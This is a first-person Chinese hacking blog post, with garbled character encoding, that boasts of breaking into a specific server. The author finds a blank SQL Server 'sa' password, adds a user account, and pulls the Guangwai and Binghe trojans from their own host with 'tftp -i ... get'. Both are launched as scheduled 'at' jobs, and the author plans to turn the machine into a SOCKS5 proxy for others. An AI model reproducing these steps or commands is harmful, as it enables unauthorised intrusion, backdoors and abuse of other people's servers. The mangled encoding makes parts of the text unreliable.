|
看看這主機是否是網(wǎng)站先,,用IE打開它的IP:61,。170。168,。168,,出現(xiàn)“該頁無法顯示”,??磥磉@主
機還沒WEB網(wǎng)頁,。祭起我的“X-SCAN”寶刀,全面掃描一下它的各種漏洞,,我就不信他沒有漏洞! (玩黑必備一:眼睛長到頭頂上) X-SCAN掃描結(jié)果報告: “端口開放:1433,、3389 ASP 漏洞:don‘t find CGI漏洞: don‘t find IIS漏洞don‘t find……,,SQL:SA /NULL” 呵呵,,大局已定,,大家看到了有哪些漏洞嗎,?什么,,你不懂鳥語,?哇噻,,你先去補習(xí)鳥語再到我這來! 對了,,我們的白靈、流二位大蝦精通由各種亂碼加鳥語組成的火星ASP語言,,聽說二位不日將移民火星, 你趁他們還在地球快去拜師學(xué)藝??! 再接著賣我的黃婆爛瓜…… 3389——我得最愛!利用遠(yuǎn)程主機打開的遠(yuǎn)程控制功能(通過3389連接)進(jìn)入它的WINDOWS圖形界面,, 這種感覺對我等菜鳥來說可不是DOS破界面能比的哦~~ 廢話少說,,打開我的“WINDOW2000遠(yuǎn)程客戶程序”,填I(lǐng)P,、點“聯(lián)接”~~???連不上!再連~~還是不行 ,!55555……輸入法漏洞是玩不成了。 一招不行再換一招,!點根煙先……打開“天行網(wǎng)絡(luò)”所制的精品軟件——SQLEXEC,,填上IP,,用戶名: SA,,密碼為空,,點“連接”---“:(連接成功,!” 進(jìn)來了,,談笑間我就進(jìn)來了,,我真厲害~~(玩黑必備二:自夸不怕嚇?biāo)廊耍O瓤纯此腃盤的文件: DIR C:,,OK!這機子裝的是WINNT,,怪不得我用WIN2000的遠(yuǎn)程客戶程序連不上,可是它怎么會打開 WIN2000的遠(yuǎn)程連接用端口-3389端口呢? 算了,,越想越亂,忙我的正事吧,。 為安全起見,讓我看看它建立了哪些連接進(jìn)程:“netstat -n”……哈,,反饋回來的信息都是一些 196開頭的IP,,沒開TTY監(jiān)聽,,這該不會是個局域網(wǎng)的服務(wù)器吧? 再來看看我現(xiàn)在的權(quán)限有多少:“net user aaa 1234 /add”---“成功建立新用戶”,。呵呵, 權(quán)限還不小,,能建新用戶哦~~由于我機子用的是WIN98,所以沒法用這新建的用戶名為AAA,,密碼 為1234的帳戶進(jìn)行連接,,這帳戶對我來說根本 沒用…… 現(xiàn)在,,我們即將開始取得遠(yuǎn)程主機的最最最……大權(quán)限,!啥,?你不信,?呵呵,,說你菜你還不高興,, 聽說過木馬嗎,?聽說過大名鼎鼎專玩木馬的“符號”大蝦嗎,?哦,,你不知木馬只知符大蝦……行, 趕明兒我讓符大蝦在你機子里也放個木馬,,這樣你就 能深刻理解啥叫木馬了~~ 繼續(xù)攻擊……我們現(xiàn)在就要上傳個木馬到遠(yuǎn)程主機,。木馬“廣外女生”現(xiàn)在國內(nèi)很流行,前幾天也 曾去黑網(wǎng)下栽了一個,,它的被控端程序才90K,,上傳比較容易,就用它做遠(yuǎn)程主機的“后門”吧,。1,。 打開TFTP(一個能把你的PC變成FTP服務(wù)器的小程序)—— 2。把“廣外女生”的被控端程序gw.exe復(fù)制到我的C盤TFTP默認(rèn)文件路徑下,。3,。在遠(yuǎn)程主機里輸入 命令:"tftp -i xx.xx.xx.xx get gw.exe c:\gw.exe" 5分鐘后,GW,。EXE已乖乖在躺在遠(yuǎn)程主機的C盤里了~~~ 現(xiàn)在,,得想法子運行GW。EXE:1,。打入命令"net time"---遠(yuǎn)程主機反饋當(dāng)前時間"09:35",。 2.打入 程序起動時間命令"at 09:37 c:\gw.exe"(GW在9:37運行)——出現(xiàn)主機反應(yīng):“建立一個新任務(wù),, ID=1” OK,!二分鐘后將運行我的“廣外女生”了! 打開我的“廣外”控制端程序,,在主機查找欄里填上“61.170.168.160---61.171.168.170”,,點 “查找”。掃描很慢……別急……掃完了……?。?!在這掃描的IP端里無中“獎”主機,!怪事??! 是遠(yuǎn)程主機的“廣外”沒有運行還是我對這控制端程序的操 作錯誤,?一定是這破“廣外”本身程序不行,太爛了~~(玩黑必備三:一切都不是我的錯?。?。 看來,今天我只得請出封存已久的國貨精品木馬——“冰河”了,。我的“冰河2,。2”的被控端有200 多K,估計上傳時間會很久,,但如果上傳成功,,它的功能可不是“廣外”所能與之并論的啊,!另外,, 對冰河的界面操作也不會似“廣外”那嚒陌生…… 言歸正傳,現(xiàn)在開始上傳“冰河”:“tftp -i xx.xx.xx.xx get G-server.exe c:\inetpub\GG.exe" (為不至于太過醒目,,這次把文件傳到C盤的INETPUB文件包下) 緩慢上傳中……讓我再點根煙,,趁這功夫去“黑白網(wǎng)絡(luò)”的技術(shù)論壇逛逛去…… 已過25分鐘了,進(jìn)遠(yuǎn)程主機瞧瞧是否已下栽成功了~~OK,!冰河已在那里了,。接著:“net time”, 反饋信息:10:30”,。“at 10:32 c:\inetpub\GG.exe”,,反饋信息“運行新任務(wù),ID=1” 二分鐘后,,打開“冰河”控制端,,加入遠(yuǎn)程主機IP,連接……成功,!接著再:添加服務(wù)器端連接密碼,、 添加冰河運行自動通知發(fā)往信箱、刪除“廣外”,、“冰河”被控端程序,。 …… 現(xiàn)在,這主機的一切已盡在我眼前了,真爽??!明天,我也許會把一個SOCK5代理的服務(wù)器端程序放進(jìn) 這主機,,大家以后要是想用SOCK5代理,,又懶得去漫無目標(biāo)的查找的話,請找我,,我會把我這個人專用 “肉機”貢獻(xiàn)出來的,。 |
|
|
